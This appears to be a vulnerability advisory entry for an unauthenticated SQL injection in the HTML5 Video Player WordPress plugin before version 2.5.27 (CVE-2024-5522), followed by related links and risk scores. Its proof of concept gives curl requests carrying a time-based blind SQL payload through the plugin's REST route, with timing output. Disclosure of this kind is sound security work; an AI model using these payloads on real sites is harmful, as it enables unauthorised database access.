Lucene search
Mayank DeshmukhWPVDB-ID:BC76EF95-A2A9-4185-8ED9-1059097A506AHistoryMay 30, 2024 - 12:00 a.m.
HTML5 Video Player < 2.5.27 - Unauthenticated SQLi
2024-05-3000:00:00
Mayank Deshmukh
wpscan.com
2
html5
video player
unauthenticated
sql injection
rest route
sql statement
security vulnerability
Description The plugin does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
PoC
% time curl “https://example.com/?rest_route=/h5vp/v1/video/1&id;=1’+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))xyz)–±” {“code”:“not_found”,“message”:“Data not found”,“data”:{“status”:404}}curl 0.01s user 0.02s system 0% cpu 5.760 total % time curl “https://example.com/?rest_route=/h5vp/v1/video/1&id;=1’+OR+(SELECT+1+FROM+(SELECT(SLEEP(1)))xyz)–±” {“code”:“not_found”,“message”:“Data not found”,“data”:{“status”:404}}curl 0.01s user 0.01s system 1% cpu 1.204 total
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 2.5.27 |
Related
cve
cve
CVE-2024-5522
2024-06-20 06:15:10
nvd
nvd
CVE-2024-5522
2024-06-20 06:15:10
wpexploit
wpexploit
HTML5 Video Player < 2.5.27 - Unauthenticated SQLi
2024-05-30 00:00:00
cvelist
cvelist
CVE-2024-5522 HTML5 Video Player < 2.5.27 - Unauthenticated SQLi
2024-06-20 06:00:04
vulnrichment
vulnrichment
CVE-2024-5522 HTML5 Video Player < 2.5.27 - Unauthenticated SQLi
2024-06-20 06:00:04
githubexploit
githubexploit
Exploit for CVE-2024-5522
2024-05-31 04:41:46
wordfence
wordfence
7.2 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPVDB-ID:BC76EF95-A2A9-4185-8ED9-1059097A506A